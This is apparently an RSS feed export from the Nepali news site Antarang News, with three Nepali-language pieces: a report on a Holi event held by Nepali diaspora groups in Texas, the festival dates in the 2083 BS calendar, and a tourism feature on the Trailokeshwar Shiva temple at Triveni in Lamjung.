मधेशी एकता समाजको आयोजनामा अमेरिकामा ‘होली धमाका’ उत्सव https://www.antaranganews.com/?p=38669 https://www.antaranganews.com/?p=38669#respond Mon, 02 Mar 2026 05:15:56 +0000 https://www.antaranganews.com/?p=38669 टेक्सास(अमेरिका)– मधेशी एकता समाजद्वारा अमेरिकाको आयोजनामा टेक्सास राज्यको इरभिङमा भव्य रूपमा होली विशेष कार्यक्रम सञ्चालन भएको छ । समाजको टेक्सास च्याप्टरद्वारा ‘होली धमाका’ कार्यक्रम फागुन १६ गते गरेको हो ।
कार्यक्रमको अध्यक्षता टेक्सास च्याप्टरका अध्यक्ष सुरेन्द्र रामले गर्नुभएको थियो । उहाँले उपस्थित सम्पूर्णलाई होलीको शुभकामना व्यक्त गर्दै प्रवासमा रहेर पनि नेपाली मौलिक संस्कृति र परम्पराको संरक्षण तथा प्रवद्र्धन गर्नु सबैको साझा जिम्मेवारी, कर्तव्य एवम् दायित्व भएको बताउनुभयो ।
समुदायका एक सयभन्दा बढी सदस्यहरूले उत्साहपूर्वक भाग लिएको कार्यक्रममा विविध सांस्कृतिक प्रस्तुतिसहित सञ्चालित कार्यक्रममा सहभागीहरूले आपसमा रंग अबिर खेल्दै आपसी सद्भाव र भाइचाराको सन्देश प्रवाह गरेका थिए ।
कार्यक्रममा नेपाली महावाणिज्य दूतावास डल्लासका प्रवक्ता प्रवीण भण्डारी, युलेस सिटीका उप–मेयर टीका पौडेल, नेपालिज सोसाइटी अफ टेक्सासका अध्यक्ष विजय भुसाल, समाजका वरिष्ठ उपाध्यक्ष सञ्जय ज्यामिरेकोसमेत विशेष उपस्थिति रहेको थियो । त्यसैगरी, विशेष अतिथिका रूपमा इन्द्रेणी समाजका अध्यक्ष नेत्र पाण्डे, समाजका अन्तर्राष्ट्रिय उपाध्यक्ष शशी यादव तथा सामाजिक अभियन्ता अमरनाथ साहलगायत विभिन्न नेपाली संघ– संस्थाका प्रतिनिधिहरूको उल्लेखनीय उपस्थिति रहेको थियो ।
वक्ताहरूले होली पर्वले आपसी सम्बन्ध सुदृढ बनाउने, विविधतामा एकता कायम गर्ने तथा सांस्कृतिक पहिचान जोगाई राख्ने सन्देश दिने उल्लेख गर्दै प्रवासमा रहेका नेपाली समुदायबीच सहकार्य र सद्भाव अझ सुदृढ बनाउन यस्ता कार्यक्रम महत्वपूर्ण हुने धारणा राख्नुभएको थियो ।
होली विशेष कार्यक्रम सफल बनाउन सहयोग पुर्याउने सम्पूर्ण अतिथि, सहभागी तथा स्वयंसेवकहरूप्रति आयोजक संस्थाले धन्यवाद ज्ञापन गरेको छ ।

]]>
https://www.antaranganews.com/?feed=rss2&p=38669 0
२०८३ सालको पात्रो सार्वजनिक : कुन पर्व कहिले ? https://www.antaranganews.com/?p=38467 https://www.antaranganews.com/?p=38467#respond Sat, 14 Feb 2026 10:09:11 +0000 https://www.antaranganews.com/?p=38467 काठमाडौँ– नेपाल पञ्चाङ्ग निर्णायक विकास समितिले २०८३ सालको पात्रो ‘पञ्चाङ्ग’ सार्वजनिक गरेको छ । नेपाल पञ्चाङ्ग निर्णायक विकास समितिले फागुन २ गते २०८३ सालको पात्रो सार्वजनिक गरेको हो ।
२०८३ सालमा मनाइने प्रमुख चाडपर्वको तिथि र मितिको बारेमा सो पात्रोमा उल्लेख गरिएको छ । जस अनुसार वैशाख ४ गते आमाको मुख हेर्ने दिन परेको छ । यो दिन मातातीर्थमा गएर स्नान गरी मनाइन्छ । ७ गते सोमबार अक्षय तृतीया र त्रेतायुग सुरु भएको मानिन्छ । वैशाख १८ गते गौतमबुद्ध जयन्ती, चण्डीपूर्णिमा तथा उभौली पर्व परेको छ ।
यसैगरी, असार ११ गते निर्जला एकादशी व्रत, यस दिन घरघरमा तुलसीको दल राख्न प्रचलन छ । साउन १ गते श्रावण सङ्क्रान्ति, लुतो फाल्ने दिनको रूपमा मनाइन्छ । साउन ९ गते हरिशयनी एकादशी व्रत परेको छ । यस दिन तुलसीको बिरुवा रोपण गरिन्छ । सोही दिनबाट चतुर्मास व्रत सुरु शास्त्रीय विधान छ ।
साउन १३ गते गुरुपूर्णिमा परेको छ, यस दिन हामी शिक्षा दिने गुरुहरूको सम्झनामा व्यास जयन्ती मनाउने गरिन्छ । साउन २८ गते गुँला धर्म आरम्भ हुनेछ ।
त्यस्तै, भदौ सक्रान्ति अर्थात १ गते नागपञ्चमी परेको छ । भदौ १२ गते रक्षाबन्धन, ऋषितर्पणी पूर्णिमा वा जनैपूर्णिमा मनाइन्छ । भदौ १३ गते गाईजात्रा, १९ गते श्रीकृष्ण जन्माष्टमी व्रत, जसलाई मोहरात्री पनि भनिन्छ । भदौ २६ गते कुशे औँसी परेको छ, जुन दिन हामी बुवाको मुख हेर्ने दिनको रूपमा मनाउँछौँ ।
भदौ २७ गते गुँला धर्म समाप्ति हुनेछ । भदौ २८ गते तीजको दर खाने दिन परेको छ । २९ गते महिलाहरूको चाड हरितालिका तीज व्रत परेको छ । भदौ ३० गते ऋषिपञ्चमी व्रत रहेको छ ।
यसैगरी, नेपाली मात्रका सबैभन्दा ठूलो पर्व बडादशैं पर्ने असोज महिनाको १ गते विश्वकर्मा पूजा, ९ गते चतुर्दशी व्रत तथा कुमारी इन्द्रजात्रा परेको छ । असोज ११ गतेबाट सोह्रश्राद्ध सुरु भई असोज २४ गते औँसी श्राद्ध गरिसकेपछि पितृ विसर्जन गरिनेछ । सोह्रश्राद्धमा दिवंगत भएका पितृहरूको सम्झनास्वरूप उनीहरूको भक्तिभावका साथ श्राद्ध गर्ने शास्त्रीय मान्यता रहेकोछ ।
असोज २५ गतेबाट विधिवत् रूपमा महानव पर्व बडादशैँ सुरु हुनेछ । २५ गते घटस्थापना स्थापना गरिन्छ भने यही दिनबाट नवरात्र आरम्भ हुनेछ । असोज ३१ गते फूलपाती पर्व मनाइन्छ । कार्तिक १ गते महाअष्टमी पर्व मनाइन्छ । यस दिनलाई भौमाष्टमी, गोरखकाली पूजा तथा कालरात्रि समेत भनिन्छ । ३ गते महानवमी परेको छ भने ४ गतेका दिन विजयादशमी अर्थात् मान्यजनबाट बडादशैंको टीका लगाउने, देवी विसर्जन गर्ने गरिन्छ । ८ गते पूर्णिमा व्रत वा कोजाग्रत व्रत मनाएसँगै विधिवत् रूपमा बडादशैँ पर्व समाप्त हुनेछ । कार्तिक ९ गते कार्तिक स्नान, आकाशदीपदान आरम्भ हुनेछ ।
कार्तिक २० गतेबाट विधिवत् रूपमा तिहार सुरु हुनेछ । २० गते प्रदोष व्रत, धन्तेरस, धनत्रयोदशी, यमदीपदान मनाइन्छ । २१ गते काग तिहार तथा धन्वन्तरी जयन्ती मनाइन्छ । २२ गते नरक चतुर्दशी, कुकुर तिहार, लक्ष्मी पूजा मनाइन्छ र यही दिनलाई सुखरात्री समेत भनिन्छ । २३ गते गाई पूजा गरिन्छ । २४ गते गोवर्धन पूजा, म्ह पूजा मनाइन्छ र यही दिन नेपाल संवत् ११४७ आरम्भ हुनेछ । २५ गते यमद्वितीया अर्थात् भाइटीका लगाइन्छ । २९ गते डाला पर्व र षष्ठी पर्व मनाइन्छ ।
यसैगरी, मंसिर ४ गते हरिबोधनी एकादशी व्रत रहेको छ । सो दिन तुलसीको विवाह गरिन्छ । ८ गते पूर्णिमा व्रत, कार्तिक स्नान र चतुर्मास व्रत समाप्ति हुनेछ । मंसिर २१ गते बालाचतुर्दशी परेको छ । यस दिन दिवंगत भएका आफन्तको नाममा धार्मिक स्थलहरूमा सतबीज छर्ने परम्परा रही आएको छ । २८ गते विवाह पञ्चमी, यस दिन जनकपुरमा सीता–रामको विवाह गर्ने परम्परागत प्रचलन रहेको छ ।
पुस ९ गते धान्यपूर्णिमा, धान्यपर्वतदान तथा उधौली पर्व मनाइन्छ । माघ १ गते माघे सङ्क्रान्ति, माघी पर्व मनाइन्छ भने यही दिनबाट उत्तरायण सुरु हुनेछ । माघ ८ गते पूर्णिमा व्रत, श्रीस्वस्थानी व्रत सुरु र माघ स्नान आरम्भ हुनेछ । माघ २४ गते सोनाम ल्होसार, माघ २८ गते वसन्त पञ्चमी (श्रीपञ्चमी) परेको छ । यस दिन सरस्वती माताको पूजा गरी शिक्षा प्राप्तिको कामना गरिन्छ ।
फागुन ८ गते माघ स्नान समाप्ति र एक महिना लामो श्रीस्वस्थानी व्रत पनि समापन गरिन्छ । फागुन २२ गते महाशिवरात्रि परेको छ भने २५ गते ग्याल्पो ल्होसार परेको छ ।
त्यस्तै, २०८३ को चैत्र ७ गते फागु पूर्णिमा पहाडी जिल्लामा होली र ८ गते तराईमा होली खेली मनाउने प्रचलन छ । चैत्र २३ गते घोडेजात्रा पर्व परेको पञ्चाङ्ग पात्रोमा उल्लेख छ ।

]]>
https://www.antaranganews.com/?feed=rss2&p=38467 0
इतिहासको खोज : लमजुङको त्रिवेणी मेला र त्रैलोकेश्वर शिव मन्दिर https://www.antaranganews.com/?p=38431 https://www.antaranganews.com/?p=38431#respond Fri, 13 Feb 2026 11:04:32 +0000 https://www.antaranganews.com/?p=38431 पर्यटनको क्षेत्रमा इतिहास धेरैको रुचिको बिषय बन्दछ । इतिहास बितेका सत्यतथ्य घटनाहरूको यथार्थ विवरण हो । त्यसैले पर्यटनका लागि इतिहास निरन्तर खोज र अनुसन्धानको विषय हो । सबै इतिहास दृश्यमान हुँदैन । इतिहासका कतिपय पाटा अदृश्य छन । लमजुङको आफ्नै गौरवपूर्ण इतिहास छ । लमजुङको पुरातात्विक सम्पदाको इतिहास धेरै लुकेको छ । त्रिवेणी धाममा अवस्थित त्रैलोकेश्वर शिव मन्दिर पुरातात्विक सम्पदा हो । तर यो मन्दिरको खोज अनुसन्धान भएको थिएन । त्रिवेणीमा कुनै शिला लेख त छैन तर जनश्रुति अनुसार चिती रामचोक बेसीको त्रैलोकेश्वर शिव मन्दिर लमजुङका शाहाकालीन राजाहरूको पालामा स्थापना भएको मानिन्छ ।
पर्यटकहरूले जहिले पनि घुम्ने ठाउँ नयाँ खोज्दछन । आफू नपुगेको ठाउँ पर्यटनको लागि नयाँ बन्दछ । नयाँं ठाउको ऐतिहासिक र पुरातत्विक स्थल धार्मिक, सांस्कृतिक परम्पराहरू र नयाँ खानपान पर्यटकहरूको रुचिको बिषय हुन्छ । पर्यटन भनेको आँफैमा बृहत क्षेत्र हो । पर्यटन भित्र धार्मिक पर्यटनको महत्व छुट्टै हुन्छ । धार्मिक पर्यटन आस्था, विश्वास, साधना र धार्मिक जिज्ञासाका कारण गरिने यात्रा हो । धार्मिक यात्रामा तीर्थाटन, दर्शन, व्रत–अनुष्ठान, धार्मिक उत्सव तथा मेलामा सहभागिता प्रमुख उद्देश्य हुन्छ । धार्मिक पर्यटक आध्यात्मिक भावनाले प्रेरित भई धार्मिक स्थलको खोजीमा हुन्छन । धार्मिक पर्यटनमा आध्यात्मिक शान्ति, आत्मिक सन्तोष र सांस्कृतिक अनुभूति पनि जोडिएको हुन्छ । चिति रामचोक बेसी त्रिवेणीको त्रैलोक्यश्वर महादेव धार्मिक आस्थाको केन्द्र हो । त्रिवेणी धाममा सुषुप्त अर्थात लुकेर रहेको शिवको प्रतिमालाई सार्वजनिक गरी मन्दिर निर्माण गर्नु केवल भौतिक संरचना खडा गर्नु मात्र होइन, धार्मिक पर्यटनको बिकासमा इतिहास धर्म र संस्कृतिको संरक्षण पनि हो ।
इतिहासमा रुचि राख्ने पर्यटकहरूका लागि पुनः निर्मित भएको त्रैलोक्यश्वर महादेवको मन्दिरमा पुग्नै पर्ने हुन्छ । इतिहासको कुनै शिलालेख त छैन तर पनि जनश्रुति अनुसार त्रैलोक्यश्वर महादेवको मन्दिर पुरातात्विक सम्पदा हो । त्रिवेणी धाममा सुषुप्त अर्थात लुकेर रहेको महादेवको पत्थर शिलालाई २०१३ ससालमा स्थानीय एकलाल पाण्डे, डिल्लीध्वज सेडाई र देवकुमारी सेडाइको अगुवाईमा मन्दिर निर्माण भै पुजाआजा सञ्चालन भएको थियो । जुन मन्दिर ०७२ को भूकम्पले भत्काएको थियो । पछिल्लो समय मन्दिर संरक्षण समितिले नगरपालिका र स्थानीय पाचँसय भन्दा बढी दानवीरहरूको सहयोगमा मन्दिर पुनः निर्माण भएको छ । मन्दिर निर्माणमा सयौं धार्मिक समाजसेवी, श्रद्धालु र स्थानीयवासीहरूको आर्थिक तथा श्रमदान सहयोग रहेको छ । यो केवल एउटा मन्दिर निर्माण होइन, सामूहिक आस्था र एकताको प्रतिफल हो । स्थानीयस्तरमा उठेको यो अभियानले धार्मिक चेतनासँगै सामाजिक एकताको सन्देश दिएको छ । प्राकृतिक धार्मिक स्थल आफैंमा आकर्षक भए पनि तीर्थयात्रीलाई सहजता दिन पूर्वाधार अनिवार्य हुन्छ । सडक, खानेपानी, शौचालय, आवास, पार्किङ, विश्रामस्थल, धार्मिक कार्यक्रम आयोजना गर्ने खुला क्षेत्र— यी सबै कुरा धार्मिक पर्यटनका आधार हुन ।
रामचोक बेसीको त्रिवेणी धाम धार्मिक विश्वासको केन्द्र बन्दै गएको छ । यहाँको प्राकृतिक शान्त वातावरण, हरियाली डाँडाकाँडा र नदीको कलकल ध्वनीले धार्मिक पर्यटकहरूलाई आध्यात्मिक अनुभूति दिन्छ । त्रिवेणीको धार्मिक आधार त्रिवेणी शब्दले तीन नदी वा तीन जलधाराको संगमलाई जनाउँछ । हिन्दु दर्शनमा संगम स्थललाई अत्यन्त पवित्र मानिन्छ । तर रामचोक बेसीको त्रिवेणीमा भने दोर्दी र मर्स्याङदी नदीको संगम अर्थात दोभान मात्र छ । त्रिवेणी शब्द धार्मिक, सांस्कृतिक र भौगोलिक तीनै सन्दर्भमा जोडिएको छ । हिन्दु दर्शन र पुराणमा त्रिवेणी भन्नाले प्रायः तीन पवित्र नदीहरूको संगम हो । तर भारतको प्रयागराजको त्रिवेणीमा गङ्गा र यमुना प्रत्यक्ष देखिन्छ भने सरस्वती भूमिगत रुपमा प्रवाहित भएको विश्वास गरिन्छ  । यसैले देखिने दुई ंअदृश्य एक त्रिवेणी नेपालका धेरै त्रिवेणी क्षेत्रमा छन । त्रिवेणी संख्यात्मक भन्दा भावनात्मक शब्द बनेको छ । तर पनि सबै दोभान त्रिवेणी हुँदैन जहाँ धार्मिक कथा, शिवस्थल, स्नान–दान परम्परा जोडिन्छ त्यहाँ दोभान स्वतः त्रिवेणी मानिन्छ । त्रिवेणीमा स्नान गर्दा पाप क्षय हुने, पुण्य वृद्धि हुने र मनोकामना पूरा हुने विश्वास रहिआएको छ ।
त्रैलोक्यश्वर अर्थात तीनै लोकका ईश्वर भगवान शिव । त्रिवेणीको पवित्र जल र शिवको आध्यात्मिक शक्ति मिलेर धार्मिक पर्यटनलाई त्रिवेणी धामलाई पवित्र बनाएको छ । दार्दी र मर्स्याङदी नदीको सगम स्थल त्रिवेणीको पौराणिक धार्मिक महत्वसँग छ । दोर्दी अर्थात नर्मदा र मर्स्याङदी अर्थात कर्मदा दुबै नदी हिमालदेखि उदगम भएको हो । कर्मदा शब्द कर्म काम र धर्मकर्म दान दिने नदी । त्यसैले मर्स्याङदी अर्थात कर्मदा नदीमा स्नान वा दान गर्नाले पाप नास भएर पुन्य प्राप्ति हुन्छ भन्ने मान्यता छ । यही विश्वासका कारण मर्स्याङदीको किनारका मन्दिरहरू धार्मिक स्नान र तर्पणका लागि पवित्र मानिन्छ । मर्स्याङदी अन्नपूर्ण हिमालको फेदीबाट अर्थात मनाङको तिलिचो तालको बेस खाङसार खोला र न्यार्खू खोलाको दोभानबाट उदगम भएको छ । हिमालको गर्भबाट उदगम भएको मर्स्याङदी नदीको पानीमा हिमालको पवित्रता, यसको घाटहरू पििबत्र मानिएको छ । मर्स्याङदी मानव सभ्यताको इतिहास संस्कृति, धर्म र पर्यटनको यात्रासंग जोडिएको छ ।
मर्स्याङदी नदीको पानीलाई गगां जलको विकल्प मानिन्छ । जसले पाप धोएर आत्मा शुद्ध गर्ने विश्वास छ । स्थानीय लोककथा अनुसार मर्स्याङदी क्षेत्र ऋषि–मुनीहरूको तपोभूमि हो । लमजुङ र मनाङका विभिन्न स्थानहरुमा रहेका पुराना गुम्बा, मन्दिर र देवस्थानहरु यस कुराको प्रमाण हुन । बौद्ध समुदायका लागि मर्स्याङदी क्षेत्र ध्यान, मौन र मुक्तिको भूमि हो भने, हिन्दूहरूका लागि मर्स्याङदी नदी स्नान, तर्पण र श्राद्धको पवित्र स्थल हो । मस्र्याङदीमा स्नान गर्नेले सात जन्मका पाप धोएर आठौं जन्ममा मुक्ति पाइने धार्मिक विस्वास छ । यो विश्वासले मर्स्याङदीका घाटहरूलाई आज पनि धार्मिक पर्यटनको केन्द्र भएको छ । अर्कोतर्फ दोर्दीको नाम महर्षि दुर्वासा ऋषिले तपस्या गरेको तपोभूमि मानिन्छ । दुर्वासा ऋषिले तपस्या गरेको स्थल मेमे, नार्सीङ र दुध पोखरी क्षेत्रको पनि छुट्टा छुट्टै धार्मिक कथा र महत्व छन । नदी किनारका धार्मिक–आध्यात्मिक महत्वका त्रिवेणी घाटलाई पवित्र तीर्थ स्थल मानिन्छ ।
पर्यटन भित्र भूगोल, इतिहास र संस्कृति पर्दछन । आजभोलि पर्यटनको क्षेत्र केवल प्रकृति, संस्कृति र हिमश्रृखलामा मात्र हुदैन । पर्यटन भित्र पनि इतिहासको खोज अनुसन्धानमा पनि पर्यटकहरूको रुचि हुन्छ । लमजुङमा शाहवंशको शुरुवाति शासनकालमा चितिमा कमली, तिवारी, पन्त, विष्ट र पाण्डे चितिका सुरुका बासिन्दा हुन । राजा यशोब्रम्ह शाह वि.सं १५५० सालमा लमजुङको राजा भएपछि चितिलाई चेतना भएका मानिसहरू बसोवास गर्ने स्थलको रुपमा लिइएको थियो । चिति शब्द ‘चेतना इति’ मिलेर चिति बनेको हो । जसको अर्थ चेतनायुक्त मानिस बस्ने भएको हुनाले चिति नामाकरण भएको हो । चितिमा राजा नरहरि शाहको पालामा स्थापना भएको रामचोकको निशान गढी कालिका मन्दिर र उदिपुरको कालिकाको मन्दिर ऐतिहासिक हुन । कालिका मन्दिर पर्यटनको लागि प्राकृतिक भ्युटावर पनि हो । मन्दिर परिशरबाट नागवेली आकारमा बग्दै आएका मर्स्याङदी र दोर्दी खोलाको दोभान त्रिवेणी अवलोकन गर्न सकिन्छ । मध्य मर्स्याङदी पावर हाउसको बाध र हिमालय हाइड्रो पावरको विद्युतगृह पनि कालिका मन्दिर परिशरबाट देख्न सकिन्छ । पर्यटकहरूले अर्कोतर्फ रामचोकको निशान कालिका मन्दिर र त्रिवेणीमा रहेको त्रिलोक्यश्वर महादेवको मन्दिर समेत कालिका मन्दिरबाट देख्न सकिन्छ ।
त्रिवेणीमा शिवरात्रीमा धार्मिक मेला लाग्ने गर्दछ । शिवरात्री हिन्दू धर्ममा भगवान शिवको आराधनाका लागि समर्पित महापर्व हो । शिवलाई सृष्टिका संहारकर्ता, योगी, तपस्वी र करुणामय देवताका रुपमा पूजा गरिन्छ । शिवरात्रीको रात जाग्राम बसेर पूजा–अर्चना, ध्यान, जप, अभिषेक र व्रत गर्ने धार्मिक परम्परा छ । शिवरात्रीको धार्मिक महत्वसँगै रामचोक बेसीको त्रिवेणीमा सांस्कृतिक विविधता पनि जोडिएको छ । भजन– कीर्तन, दीप प्रज्वलन र मेलाले त्रिवेणीमा रमणिय हुन्छ । त्रिवेणी मेलाले धार्मिक आस्थालाई सामूहिक उत्सवमा रुपान्तरण गर्दछ । त्रैलोक्यश्वर महादेव मन्दिर निर्माणसँगै त्रिवेणी क्षेत्र धार्मिक गतिविधिको केन्द्र बन्दै गएको छ । शिवरात्रि, तीज, साउन महिनाको बोलबम यात्रा, एकादशी, संक्रान्ति आदिमा तीर्थाटनका लागि पुग्दछन ।पर्यटकले गाउँको इतिहास खोज्नु भनेको राजाको मात्र इतिहास खोज्नु होइन । पर्यटकहरुले खेत जोत्ने किसानको कथा, बसाइँ सरेर आएका पुर्खाको स्मृति, खोलाले बाटो फेरिदिँदा बदलिएको जीवनशैली, मेला,पूजा, परम्पराले बाँधेको सामूहिक चेतना समेत खोज्दछन ।
इतिहासले दृश्यलाई आत्मा दिन्छ । पर्यटकहरुलाई इतिहास र संस्कृतिमा रुचि हुन्छ । किनकि प्रकृतिले आँखालाई सन्तुष्टि दिन्छ । इतिहासले मनलाई अर्थ दिन्छ । संस्कृतिले यात्रालाई स्मरणीय बनाउँछ । धार्मिक पर्यटनले स्थानीय अर्थतन्त्रलाई चलायमान बनाउँछ । तीर्थयात्रीको आगमनले होटल, पसल, यातायात, कृषि उत्पादन र स्थानीय हस्तकला व्यवसायलाई टेवा पुर्याउँछ । त्रिवेणीमा धार्मिक पर्यटकको वृद्धि हुँदा स्थानीय कृषिजन्य उत्पादन, प्रसाद सामग्री, फूलमाला, धार्मिक सामग्री आदिको व्यापार विस्तार हुन सक्छ । त्रैलोक्यश्वर महादेव मन्दिरले चिति क्षेत्रको सांस्कृतिक पहिचानलाई बलियो बनाएको छ । स्थानीय भजन–कीर्तन, धार्मिक अनुष्ठान, कथा–प्रवचन, महायज्ञजस्ता कार्यक्रमले रामचोकबेसीको सांस्कृतिक जीवन्तता बढाउन सक्छ । धार्मिक पर्यटनले केवल आर्थिक समृद्धि मात्र होइन, सांस्कृतिक पुनर्जागरणको मार्ग पनि प्रशस्त गर्छ । अब त्रिवेणी क्षेत्रलाई दीर्घकालीन योजनासहित विकास गर्नु पर्दछ । पर्यटनका लागि ध्यान–योग धर्मशाला, पर्यावरणमैत्री पदमार्ग, धार्मिक अध्ययन केन्द्र जस्ता परियोजना सञ्चालन गर्न सकिन्छ । यसले धार्मिक पर्यटनलाई प्रकृतिसँग सन्तुलित रुपमा अघि बढाउन मद्दत पुर्याउछ । स्थानीय सरकार, पर्यटन व्यवसायी र धार्मिक संस्थाहरूबीच समन्वय भयो भने त्रैलोक्यश्वर महादेव मन्दिर लमजुङको धार्मिक नक्सामा उज्यालो तारा बन्ने निश्चित छ ।
रामचोकबेसीको त्रिवेणीमा निर्माण गरिएको त्रिलोकेश्वर महादेव मन्दिर केवल एक धार्मिक संरचना मात्र होइन, त्यो चिति गाउँको पहिचान, विश्वास र पर्यटनको उज्यालो दीपस्तम्भ बनेको छ । मन्दिर निर्माण भएपछि चितिको रामचोकबेसी गाउँलाई धार्मिक पर्यटनको नक्सामा उल्लेखनीय रुपमा स्थापित गराएको छ । त्रिलोकेश्वर महादेव मन्दिरले चिति गाउँलाई आस्थाको केन्द्र मात्र बनाएको छैन, यसले गाउँको आर्थिक, सांस्कृतिक र पर्यटन विकासमा उल्लेखनीय योगदान दिएको छ । आज चिती गाउँ केवल एक भौगोलिक स्थान होइन, श्रद्धा, शान्ति र सम्भावनाको प्रतीक बनेको छ । त्रिवेणीको संगमजस्तै यहाँ धर्म, प्रकृति र विकास एकै ठाउँमा मिसिएका छन र यही संगमले चितिलाई नयाँ उज्यालो भविष्यतर्फ डोर्याइरहेको छ । त्रिलोकेश्वर महादेव मन्दिरले धार्मिक गतिविधि मात्र होइन, सांस्कृतिक चेतना पनि जगाएको छ । त्रिलोकेश्वर महादेव मन्दिरमा भजन–कीर्तन, धार्मिक प्रवचन, सांस्कृतिक कार्यक्रमहरू आयोजना हुन थालेका छन । यसले नयाँ पुस्तालाई आफ्नै संस्कार र परम्परासँग जोडने काम गरेको छ । चिति गाउँको पर्यटनमा नक्काकन थपिएको छ ।
त्रिवेणी धाम कसरी जाने ?
बेसीशहर नगरपालिका– ११ को त्रिवेणी धाम पुग्ने विभिन्न बाटाहरू छन । आफ्नै साधन भए उदिपुरदेखि रिठ्ठे बगर हँुदै ५ किलो मिटरको यात्रामा त्रैलोक्यश्वर महादेव मन्दिर पुग्न सकिन्छ । अर्कोतर्फ पद यात्रामा रम्न खोज्ने पर्यटकहमर्स्याङदी ले डूम्रे–बेसीशहर मोटर मार्गमा पर्ने रामदीदेखि हिमालय हाइड्रो पावर नजिकको झलुङेपुल तरेर पनि आधा घन्टाको पद यात्रामा पुग्न सकिन्छ ।
(लेखक : लामो समयदेखि पत्रकारितामा सक्रीय रहनु भएका उहाँ लमजुङ जन्म थलो भई दाङलाई कर्मथलोका रुपमा रोज्नु भई नेपालको पर्यटनका बारेमा विशेष दखल राख्दै कलम चलाउने गर्नु हुन्छ । – सं.)
]]>
https://www.antaranganews.com/?feed=rss2&p=38431 0